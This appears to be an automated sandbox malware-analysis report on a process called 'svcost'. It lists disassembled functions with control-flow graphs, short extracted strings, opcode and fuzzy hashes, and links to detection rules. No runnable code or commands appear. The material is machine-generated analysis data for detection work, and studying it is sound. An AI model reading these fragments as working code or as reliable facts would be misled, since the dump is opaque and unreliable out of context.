                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 226 69d970-69d9a1 227 69d9a8-69da38 call 69e4f6 226->227 228 69d9a3 226->228 233 69da3e-69da8b 227->233 228->227 236 69da9a 233->236 237 69da8d-69da98 233->237 238 69daa4-69dbbf 236->238 237->238 249 69dbd1-69dbfc 238->249 250 69dbc1-69dbc7 238->250 251 69e3c8-69e3e4 249->251 250->249 252 69e3ea-69e405 251->252 253 69dc01-69dd64 call 69c798 251->253 264 69dd76-69df0b call 699f18 call 699df0 253->264 265 69dd66-69dd6c 253->265 277 69df0d-69df11 264->277 278 69df70-69df7a 264->278 265->264 279 69df19-69df6b 277->279 280 69df13-69df14 277->280 281 69e1a1-69e1c0 278->281 282 69e246-69e2b1 279->282 280->282 283 69df7f-69e0c5 call 69c798 281->283 284 69e1c6-69e1f0 281->284 301 69e2c3-69e30e 282->301 302 69e2b3-69e2b9 282->302 313 69e0cb-69e197 call 69c798 283->313 314 69e19a-69e19b 283->314 290 69e243-69e244 284->290 291 69e1f2-69e240 284->291 290->282 291->290 304 69e3ad-69e3c5 301->304 305 69e314-69e3ac 301->305 302->301 304->251 305->304 313->314 314->281
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: f"p$h$xC$xC$xC$cV
                                                                                            • API String ID: 0-785447965
                                                                                            • Opcode ID: 91cdae61c447c0b6b29348599296a0782da69b854f24f51855ea8492e6ac903f
                                                                                            • Instruction ID: 4e943302cf8afc5837d8ebc95c9259a9817109b152f0fff82d9db85d2d432761
                                                                                            • Opcode Fuzzy Hash: 91cdae61c447c0b6b29348599296a0782da69b854f24f51855ea8492e6ac903f
                                                                                            • Instruction Fuzzy Hash: 8B71F475E042288FEB64DF69C850BDAB7B2FF89300F5082AAD419B7255DB306E85CF50
                                                                                            Function 02110040 Relevance: 7.6, Strings: 5, Instructions: 1335COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 322 2110040-211006e 323 2110070 322->323 324 2110075-2110197 322->324 323->324 328 2110199-21101b5 call 2112bc0 324->328 329 21101bb-21101c7 324->329 328->329 330 21101c9 329->330 331 21101ce-21101d3 329->331 330->331 333 21101d5-21101e1 331->333 334 211020b-2110254 331->334 335 21101e3 333->335 336 21101e8-2110206 333->336 344 2110256 334->344 345 211025b-2110520 334->345 335->336 337 211196f-2111975 336->337 339 21119a0 337->339 340 2111977-2111997 337->340 343 21119a1 339->343 340->339 343->343 344->345 370 2110f50-2110f5c 345->370 371 2110f62-2110f9a 370->371 372 2110525-2110531 370->372 381 2111074-211107a 371->381 373 2110533 372->373 374 2110538-211065d 372->374 373->374 409 211069d-2110726 374->409 410 211065f-2110697 374->410 382 2111080-21110b8 381->382 383 2110f9f-211101c 381->383 393 2111416-211141c 382->393 398 211104f-2111071 383->398 399 211101e-2111022 383->399 396 2111422-211146a 393->396 397 21110bd-21112bf 393->397 406 21114e5-2111530 396->406 407 211146c-21114df 396->407 490 21112c5-2111359 397->490 491 211135e-2111362 397->491 398->381 399->398 402 2111024-211104c 399->402 402->398 427 2111939-211193f 406->427 407->406 437 2110735-21107b9 409->437 438 2110728-2110730 409->438 410->409 430 2111535-21115b7 427->430 431 2111945-211196d 427->431 450 21115b9-21115d4 430->450 451 21115df-21115eb 430->451 431->337 463 21107c8-211084c 437->463 464 21107bb-21107c3 437->464 440 2110f41-2110f4d 438->440 440->370 450->451 453 21115f2-21115fe 451->453 454 21115ed 451->454 455 2111611-2111620 453->455 456 2111600-211160c 453->456 454->453 461 2111622 455->461 462 2111629-2111901 455->462 460 2111920-2111936 456->460 460->427 461->462 465 21117f6-211185e 461->465 466 2111788-21117f1 461->466 467 211171a-2111783 461->467 468 211169d-2111715 461->468 469 211162f-2111698 461->469 496 211190c-2111918 462->496 513 211085b-21108df 463->513 514 211084e-2110856 463->514 464->440 502 21118d2-21118d8 465->502 466->496 467->496 468->496 469->496 515 21113fd-2111413 490->515 497 2111364-21113bd 491->497 498 21113bf-21113fc 491->498 496->460 497->515 498->515 504 2111860-21118be 502->504 505 21118da-21118e4 502->505 518 21118c0 504->518 519 21118c5-21118cf 504->519 505->496 528 21108e1-21108e9 513->528 529 21108ee-2110972 513->529 514->440 515->393 518->519 519->502 528->440 535 2110981-2110a05 529->535 536 2110974-211097c 529->536 542 2110a14-2110a98 535->542 543 2110a07-2110a0f 535->543 536->440 549 2110aa7-2110b2b 542->549 550 2110a9a-2110aa2 542->550 543->440 556 2110b3a-2110bbe 549->556 557 2110b2d-2110b35 549->557 550->440 563 2110bc0-2110bc8 556->563 564 2110bcd-2110c51 556->564 557->440 563->440 570 2110c60-2110ce4 564->570 571 2110c53-2110c5b 564->571 577 2110cf3-2110d77 570->577 578 2110ce6-2110cee 570->578 571->440 584 2110d86-2110e0a 577->584 585 2110d79-2110d81 577->585 578->440 591 2110e19-2110e9d 584->591 592 2110e0c-2110e14 584->592 585->440 598 2110eac-2110f30 591->598 599 2110e9f-2110ea7 591->599 592->440 605 2110f32-2110f3a 598->605 606 2110f3c-2110f3e 598->606 599->440 605->440 606->440
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0lC$2$H<C$LkC$cV
                                                                                            • API String ID: 0-608499003
                                                                                            • Opcode ID: fa2a3e1e263a4665c1c006c68e0eefabd0039ac7ea4fb6e075b2cbc49fa45da3
                                                                                            • Instruction ID: eb6442e64555ca8d1ffe85f13f1c3415773016021edd3cbe9d1f67c623b119b9
                                                                                            • Opcode Fuzzy Hash: fa2a3e1e263a4665c1c006c68e0eefabd0039ac7ea4fb6e075b2cbc49fa45da3
                                                                                            • Instruction Fuzzy Hash: 58E2B374A046288FCB65DF68D88479EB7F2FB89301F1081EAE519A7395DB709E85CF40
                                                                                            Function 023AC020 Relevance: 6.2, Strings: 4, Instructions: 1176COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kp$fp
                                                                                            • API String ID: 0-1917797414
                                                                                            • Opcode ID: 6ef88ef9399f207a45105c882ffe6faa4fc2478b0b975ca1572fe6f20f488a86
                                                                                            • Instruction ID: db14c16fb82e456d98f9aa76ed111164556b5bdbe5c1a8c09a082a04a38d7437
                                                                                            • Opcode Fuzzy Hash: 6ef88ef9399f207a45105c882ffe6faa4fc2478b0b975ca1572fe6f20f488a86
                                                                                            • Instruction Fuzzy Hash: 33B2F634A00218DFDB14DFA8C894BADB7B6FF88704F1495AAE505AB3A5DB70AC41CF50
                                                                                            Function 002FCAD8 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1171 2fcad8-2fcaf9 1172 2fcafb 1171->1172 1173 2fcb00-2fcbe7 1171->1173 1172->1173 1175 2fcbed-2fcd2e call 2f9028 1173->1175 1176 2fd2e9-2fd311 1173->1176 1222 2fcd34-2fcd8f 1175->1222 1223 2fd2b2-2fd2dc 1175->1223 1179 2fda17-2fda20 1176->1179 1181 2fd31f-2fd329 1179->1181 1182 2fda26-2fda3d 1179->1182 1183 2fd32b 1181->1183 1184 2fd330-2fd424 call 2f9028 1181->1184 1183->1184 1205 2fd44e 1184->1205 1206 2fd426-2fd432 1184->1206 1209 2fd454-2fd474 1205->1209 1207 2fd43c-2fd442 1206->1207 1208 2fd434-2fd43a 1206->1208 1211 2fd44c 1207->1211 1208->1211 1213 2fd476-2fd4cf 1209->1213 1214 2fd4d4-2fd554 1209->1214 1211->1209 1226 2fda14 1213->1226 1234 2fd5ab-2fd5ee call 2f9028 1214->1234 1235 2fd556-2fd5a9 1214->1235 1231 2fcd94-2fcd9f 1222->1231 1232 2fcd91 1222->1232 1236 2fd2de 1223->1236 1237 2fd2e6 1223->1237 1226->1179 1233 2fd1c7-2fd1cd 1231->1233 1232->1231 1238 2fcda4-2fcdc2 1233->1238 1239 2fd1d3-2fd24f call 2f84f0 1233->1239 1266 2fd5f9-2fd602 1234->1266 1235->1266 1236->1237 1237->1176 1241 2fce19-2fce2e 1238->1241 1242 2fcdc4-2fcdc8 1238->1242 1282 2fd29c-2fd2a2 1239->1282 1247 2fce35-2fce4b 1241->1247 1248 2fce30 1241->1248 1242->1241 1245 2fcdca-2fcdd5 1242->1245 1249 2fce0b-2fce11 1245->1249 1253 2fce4d 1247->1253 1254 2fce52-2fce69 1247->1254 1248->1247 1257 2fcdd7-2fcddb 1249->1257 1258 2fce13-2fce14 1249->1258 1253->1254 1255 2fce6b 1254->1255 1256 2fce70-2fce86 1254->1256 1255->1256 1262 2fce8d-2fce94 1256->1262 1263 2fce88 1256->1263 1260 2fcddd 1257->1260 1261 2fcde1-2fcdf9 1257->1261 1265 2fce97-2fcf02 1258->1265 1260->1261 1267 2fcdfb 1261->1267 1268 2fce00-2fce08 1261->1268 1262->1265 1263->1262 1269 2fcf16-2fd0cb 1265->1269 1270 2fcf04-2fcf10 1265->1270 1272 2fd662-2fd671 1266->1272 1267->1268 1268->1249 1280 2fd12f-2fd144 1269->1280 1281 2fd0cd-2fd0d1 1269->1281 1270->1269 1273 2fd604-2fd62c 1272->1273 1274 2fd673-2fd6fb 1272->1274 1275 2fd62e 1273->1275 1276 2fd633-2fd65c 1273->1276 1309 2fd874-2fd880 1274->1309 1275->1276 1276->1272 1286 2fd14b-2fd16c 1280->1286 1287 2fd146 1280->1287 1281->1280 1288 2fd0d3-2fd0e2 1281->1288 1284 2fd2a4-2fd2aa 1282->1284 1285 2fd251-2fd299 1282->1285 1284->1223 1285->1282 1289 2fd16e 1286->1289 1290 2fd173-2fd192 1286->1290 1287->1286 1292 2fd121-2fd127 1288->1292 1289->1290 1297 2fd199-2fd1b9 1290->1297 1298 2fd194 1290->1298 1295 2fd129-2fd12a 1292->1295 1296 2fd0e4-2fd0e8 1292->1296 1303 2fd1c4 1295->1303 1299 2fd0ea-2fd0ee 1296->1299 1300 2fd0f2-2fd113 1296->1300 1301 2fd1bb 1297->1301 1302 2fd1c0 1297->1302 1298->1297 1299->1300 1305 2fd11a-2fd11e 1300->1305 1306 2fd115 1300->1306 1301->1302 1302->1303 1303->1233 1305->1292 1306->1305 1311 2fd886-2fd8e1 1309->1311 1312 2fd700-2fd709 1309->1312 1327 2fd918-2fd942 1311->1327 1328 2fd8e3-2fd916 1311->1328 1313 2fd70b 1312->1313 1314 2fd712-2fd868 1312->1314 1313->1314 1316 2fd75d-2fd79d 1313->1316 1317 2fd718-2fd758 1313->1317 1318 2fd7e7-2fd827 1313->1318 1319 2fd7a2-2fd7e2 1313->1319 1332 2fd86e 1314->1332 1316->1332 1317->1332 1318->1332 1319->1332 1336 2fd94b-2fd9de 1327->1336 1328->1336 1332->1309 1340 2fd9e5-2fda05 1336->1340 1340->1226
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0C$TJ"p$p!p$xb p
                                                                                            • API String ID: 0-2232361194
                                                                                            • Opcode ID: 3b94726669cc1c72c391e4b40620e70b532d0c777aa9fb63d92b0add06447d09
                                                                                            • Instruction ID: ebd28646979bd7989d0f23eb064a5bbdf4d68fdb5ed06354ef0cb4978ec7380d
                                                                                            • Opcode Fuzzy Hash: 3b94726669cc1c72c391e4b40620e70b532d0c777aa9fb63d92b0add06447d09
                                                                                            • Instruction Fuzzy Hash: E0A2B575A10228CFDB64CF69C984B9DBBB2BF89304F1581E9D509AB325DB319E91CF40
                                                                                            Function 023AC347 Relevance: 5.5, Strings: 4, Instructions: 495COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kp$fp
                                                                                            • API String ID: 0-1917797414
                                                                                            • Opcode ID: 4f89dbed71b7a2ad2c52cbdb18542e6ed50ed43828e1c3441bc85a2db2260f7e
                                                                                            • Instruction ID: 58bfda7d15e2d0a8060f9c4dd67e24447f1395e9701f3735970ee379cf54824a
                                                                                            • Opcode Fuzzy Hash: 4f89dbed71b7a2ad2c52cbdb18542e6ed50ed43828e1c3441bc85a2db2260f7e
                                                                                            • Instruction Fuzzy Hash: 48221D74A00218DFDB24DF64C894BADB7B2FF48704F1495AAE509AB3A5DB70AD81CF50
                                                                                            Function 021119A3 Relevance: 4.3, Strings: 3, Instructions: 539COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2048 21119a3-2111a4b 2055 2111a51-2111b14 2048->2055 2056 2111b23-2111b6b 2048->2056 2055->2056 2086 2111b16-2111b20 2055->2086 2061 2111b71-2111bb3 2056->2061 2062 2111d0c-2111dc0 2056->2062 2070 2111cf1-2111d00 2061->2070 2091 2111dc6-2111e7d 2062->2091 2092 2111e7f-2111eb9 2062->2092 2071 2111bd0-2111bdf 2070->2071 2072 2111d06-2111d07 2070->2072 2076 2111be1 2071->2076 2077 2111be6-2111c58 2071->2077 2074 211208f-21120e4 2072->2074 2093 211237d-21123ab 2074->2093 2076->2077 2088 2111c5a 2077->2088 2089 2111c5f-2111ce6 2077->2089 2086->2056 2088->2089 2136 2111ce8 2089->2136 2137 2111ceb 2089->2137 2105 2111ec0-2111ec9 2091->2105 2092->2105 2101 21123b1-21123d2 2093->2101 2102 21120e9-211212a 2093->2102 2172 21123d8 call 21155c9 2101->2172 2173 21123d8 call 21155d8 2101->2173 2108 2112133-2112134 2102->2108 2109 211212c 2102->2109 2110 211207a-2112089 2105->2110 2120 2112377 2108->2120 2109->2108 2112 2112311-2112323 2109->2112 2113 2112280-21122c5 2109->2113 2114 21121b3-2112211 2109->2114 2115 2112333-211236c 2109->2115 2116 2112216-211227b 2109->2116 2117 2112139-211214b 2109->2117 2118 21122ca-211230f 2109->2118 2119 211215e-21121ae 2109->2119 2110->2074 2121 2111ece-2111edd 2110->2121 2127 2112325 2112->2127 2128 211232a-2112331 2112->2128 2113->2120 2114->2120 2115->2120 2116->2120 2125 2112152-2112159 2117->2125 2126 211214d 2117->2126 2118->2120 2119->2120 2120->2093 2130 2111ee4-2111f65 2121->2130 2131 2111edf 2121->2131 2123 21123de-211241a call 541deb8 2151 2112420 2123->2151 2125->2120 2126->2125 2127->2128 2128->2120 2160 2111ff4-211201f 2130->2160 2161 2111f6b-2111f96 2130->2161 2131->2130 2136->2137 2137->2070 2164 2112021 2160->2164 2165 2112026-2112069 2160->2165 2162 2111f98 2161->2162 2163 2111f9d-2111fef 2161->2163 2162->2163 2171 2112074 2163->2171 2164->2165 2165->2171 2171->2110 2172->2123 2173->2123
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `{C$`{C$cV
                                                                                            • API String ID: 0-4145016544
                                                                                            • Opcode ID: fac0370aa7a3d5d32422fea588337a56ad76379bf6db95e606798c2cb5cb93bf
                                                                                            • Instruction ID: 09cd066950833ed1e9e50493d1312e1ec063d210db4949972fe4fe370bc6e92b
                                                                                            • Opcode Fuzzy Hash: fac0370aa7a3d5d32422fea588337a56ad76379bf6db95e606798c2cb5cb93bf
                                                                                            • Instruction Fuzzy Hash: A152A574A046288FCB65DF28CD84B9AB7B2FB89301F5081E9D90DA7355DB30AE81CF55
                                                                                            Function 02110007 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 4cd2d5aba49d7088af42512d1127a0d5a97951ad285c9bbedf6fe729a7038847
                                                                                            • Instruction ID: f0b4baabcdc1b0d595312a9c61310886b22fb1f839f7c8c1b516350a51fe6e28
                                                                                            • Opcode Fuzzy Hash: 4cd2d5aba49d7088af42512d1127a0d5a97951ad285c9bbedf6fe729a7038847
                                                                                            • Instruction Fuzzy Hash: 31611E71D05A588FDB19CF6BCC5429ABBF3AFCA305F08C0AAC448AB265DB744985CF51
                                                                                            Function 0211D500 Relevance: .2, Instructions: 247COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bd0bff349a282f87cc6f9820598e38d12d6cd8299edf6267fcb4f39176c36616
                                                                                            • Instruction ID: 587c8cff0cb9bfa264af416fcff920781bde55ac1f13d31e5b1d1b1dd2b1ebd9
                                                                                            • Opcode Fuzzy Hash: bd0bff349a282f87cc6f9820598e38d12d6cd8299edf6267fcb4f39176c36616
                                                                                            • Instruction Fuzzy Hash: 19B1F374E45218CFDB18DFAAE884BADBBF2BF89304F11907AD419AB255DB305985CF00
                                                                                            Function 0211C858 Relevance: .2, Instructions: 209COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb47a3536d27b447daaaae27aa92968f18b98a8b9ef0a11abe6658e9b6a99243
                                                                                            • Instruction ID: 88d77047f0d0293ad730fa9b1042c16bf44405d2d63942b7f9eb29c02b9c2e32
                                                                                            • Opcode Fuzzy Hash: fb47a3536d27b447daaaae27aa92968f18b98a8b9ef0a11abe6658e9b6a99243
                                                                                            • Instruction Fuzzy Hash: 81912770E89218CFEB28CF69D954BADBBF2BB49314F1090BAD019E7251D7715984CF82
                                                                                            Function 002F8A00 Relevance: .2, Instructions: 170COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 857881b057ebe87e9d42e9965e44194c243af0cc4e6adc55bfea763b4e06e420
                                                                                            • Instruction ID: 5ad20ae3e8297858cbef8882c9b3b23b08f972f8d13b617d6b9026aee3c8a030
                                                                                            • Opcode Fuzzy Hash: 857881b057ebe87e9d42e9965e44194c243af0cc4e6adc55bfea763b4e06e420
                                                                                            • Instruction Fuzzy Hash: CA712FB5E046058FD708EFAAE851A9EBBF2BF96300F04C57AD014AB274DF705946CB50
                                                                                            Function 002F8A10 Relevance: .2, Instructions: 165COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8db98ea06f5c4ab6668a8f428d4029e853eb55adbdb9632e9159b515ce214b45
                                                                                            • Instruction ID: e3508265df50fdebab352fd33b4f5a2809f1b751ac486408bcd26d7cb4d45ced
                                                                                            • Opcode Fuzzy Hash: 8db98ea06f5c4ab6668a8f428d4029e853eb55adbdb9632e9159b515ce214b45
                                                                                            • Instruction Fuzzy Hash: EA711DB5E006058FD708EFAAE841A9EBBF2BBD9300F04C57AD414AB278DF705946CB50
                                                                                            Function 023AF150 Relevance: 6.8, Strings: 5, Instructions: 577COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 608 23af150-23af151 609 23af1ba-23af1c0 608->609 610 23af153-23af159 608->610 611 23af1c2-23af1c9 609->611 610->611 612 23af15b-23af179 610->612 620 23af1cb-23af1cc 611->620 621 23af23c-23af252 call 23af968 611->621 613 23af17b-23af189 612->613 614 23af1e2-23af203 612->614 618 23af18b-23af195 613->618 619 23af19c-23af19e 613->619 616 23af212-23af21b 614->616 617 23af205-23af210 614->617 617->616 622 23af21e-23af23b 617->622 618->619 625 23af2a3-23af2ca call 23ae2e0 621->625 626 23af254-23af26c call 23aada8 621->626 622->621 632 23af4cf-23af4e1 call 23aed20 625->632 633 23af2d0 625->633 626->625 631 23af26e-23af299 call 23adb48 626->631 631->625 641 23af29b-23af2a0 631->641 639 23af4e3-23af4fb 632->639 640 23af500-23af506 632->640 638 23af2d9-23af2e1 633->638 642 23af2ea-23af2ed 638->642 643 23af2e3 638->643 639->640 668 23af4fd 639->668 644 23af508-23af50f 640->644 645 23af515-23af55f call 2fe3d8 640->645 641->625 659 23af2f3-23af2f6 642->659 660 23af470-23af4a1 642->660 643->642 646 23af43a-23af44d 643->646 647 23af3b8-23af3cc 643->647 648 23af358-23af36b 643->648 649 23af318-23af353 643->649 650 23af39f-23af3b3 643->650 651 23af452-23af46e 643->651 652 23af370-23af383 643->652 653 23af3d1-23af3e4 643->653 654 23af40a-23af41c 643->654 655 23af388-23af39a 643->655 656 23af3e9-23af405 643->656 657 23af301-23af313 643->657 658 23af421-23af435 643->658 644->645 662 23af511-23af513 644->662 685 23af565 645->685 646->632 647->632 648->632 649->632 650->632 651->632 652->632 653->632 654->632 655->632 656->632 657->632 658->632 663 23af2fc 659->663 664 23af4a3-23af4cd 659->664 660->632 670 23af567-23af569 662->670 663->632 664->632 668->640 683 23af56f-23af578 670->683 684 23af88d-23af896 670->684 686 23af58a-23af5ca call 23ae4a0 683->686 687 23af57a-23af582 683->687 685->670 696 23af5de 686->696 697 23af5cc-23af5dc 686->697 687->686 698 23af5e0-23af5e2 696->698 697->696 697->698 700 23af601-23af630 698->700 701 23af5e4-23af5ff 698->701 706 23af66d-23af675 700->706 710 23af632-23af65e 700->710 701->706 708 23af683 706->708 709 23af677-23af681 706->709 711 23af688-23af68a 708->711 709->711 710->706 720 23af660-23af664 710->720 712 23af69a-23af70c 711->712 713 23af68c-23af692 711->713 721 23af70e-23af725 712->721 722 23af730-23af756 712->722 713->712 720->706 721->722 724 23af758-23af765 call 2feca8 722->724 725 23af76d 722->725 727 23af76b 724->727 726 23af76f-23af78e 725->726 726->684 729 23af794-23af7a6 call 23aed20 726->729 727->726 729->684 732 23af7ac-23af7c4 729->732 734 23af7fd-23af815 732->734 735 23af7c6-23af7cf 732->735 740 23af817-23af820 734->740 741 23af845-23af85d 734->741 736 23af7de-23af7e5 735->736 737 23af7d1-23af7d4 735->737 736->734 739 23af7e7-23af7f8 736->739 737->736 739->684 742 23af82f-23af838 740->742 743 23af822-23af825 740->743 741->684 747 23af85f-23af868 741->747 742->741 745 23af83a-23af842 742->745 743->742 745->741 749 23af86a-23af86d 747->749 750 23af877-23af880 747->750 749->750 750->684 751 23af882-23af88a 750->751 751->684
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8`p$Op$Op$Op$Op
                                                                                            • API String ID: 0-1327710682
                                                                                            • Opcode ID: 27fbf7831b841d78e27a852d76cd2b37a0fa3c996080def570cedb053f1f4d49
                                                                                            • Instruction ID: f4010e8a90639bc26137791802dc12afb3815137cc7c0e21a1d12676502a8d43
                                                                                            • Opcode Fuzzy Hash: 27fbf7831b841d78e27a852d76cd2b37a0fa3c996080def570cedb053f1f4d49
                                                                                            • Instruction Fuzzy Hash: F3229D35A00214DFDB14DFA4C8A4A6DBBB6EF88314F148169E905AB7A5CB76EC41CB90
                                                                                            Function 002FE3D8 Relevance: 6.6, Strings: 5, Instructions: 358COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 756 2fe3d8-2fe400 758 2fe4ec-2fe511 756->758 759 2fe406-2fe40a 756->759 766 2fe518-2fe53c 758->766 760 2fe41e-2fe422 759->760 761 2fe40c-2fe418 759->761 762 2fe428-2fe43f 760->762 763 2fe543-2fe568 760->763 761->760 761->766 774 2fe453-2fe457 762->774 775 2fe441-2fe44d 762->775 785 2fe56f-2fe59f 763->785 766->763 777 2fe459-2fe472 call 2f01b0 774->777 778 2fe483-2fe49c 774->778 775->774 775->785 777->778 789 2fe474-2fe477 777->789 790 2fe49e-2fe4c2 778->790 791 2fe4c5-2fe4e9 778->791 799 2fe5a1-2fe5a9 785->799 794 2fe480 789->794 794->778 800 2fe5ab-2fe5c2 799->800 801 2fe612-2fe614 799->801 803 2fe5fa-2fe60b 800->803 804 2fe5c4-2fe5e4 800->804 801->799 802 2fe615-2fe61c 801->802 808 2fe61e 802->808 809 2fe650-2fe651 802->809 803->801 816 2fe626-2fe64b 804->816 818 2fe5e6-2fe5f7 804->818 808->800 810 2fe61f-2fe620 808->810 809->810 811 2fe652-2fe67a 809->811 810->816 814 2fe721-2fe76f 811->814 815 2fe680-2fe68c 811->815 836 2fe79f-2fe7a5 814->836 837 2fe771-2fe795 814->837 822 2fe68e-2fe695 815->822 823 2fe696-2fe6aa 815->823 816->809 830 2fe6ac-2fe6d1 823->830 831 2fe719-2fe720 823->831 842 2fe714-2fe717 830->842 843 2fe6d3-2fe6ed 830->843 839 2fe7b7-2fe7c6 836->839 840 2fe7a7-2fe7b4 836->840 837->836 838 2fe797 837->838 838->836 842->830 842->831 843->842 845 2fe6ef-2fe6f8 843->845 846 2fe6fa-2fe6fd 845->846 847 2fe707-2fe713 845->847 846->847
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$(!p$(!p$(!p$(!p
                                                                                            • API String ID: 0-3955841951
                                                                                            • Opcode ID: 5c7852c407a779555126763907037b85b774c9c6f2af4811414a57ba3c2d41ae
                                                                                            • Instruction ID: 57ed7ca989744004d435fe1d3113ff8cc2acaae120bb8ff46bd18d921a451a01
                                                                                            • Opcode Fuzzy Hash: 5c7852c407a779555126763907037b85b774c9c6f2af4811414a57ba3c2d41ae
                                                                                            • Instruction Fuzzy Hash: E9C146323143154FDB19DF68D850A7EBBA6EF84351B19817AFA09CB3A6CB34DC128791
                                                                                            Function 023AC6A9 Relevance: 5.5, Strings: 4, Instructions: 478COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kp$fp
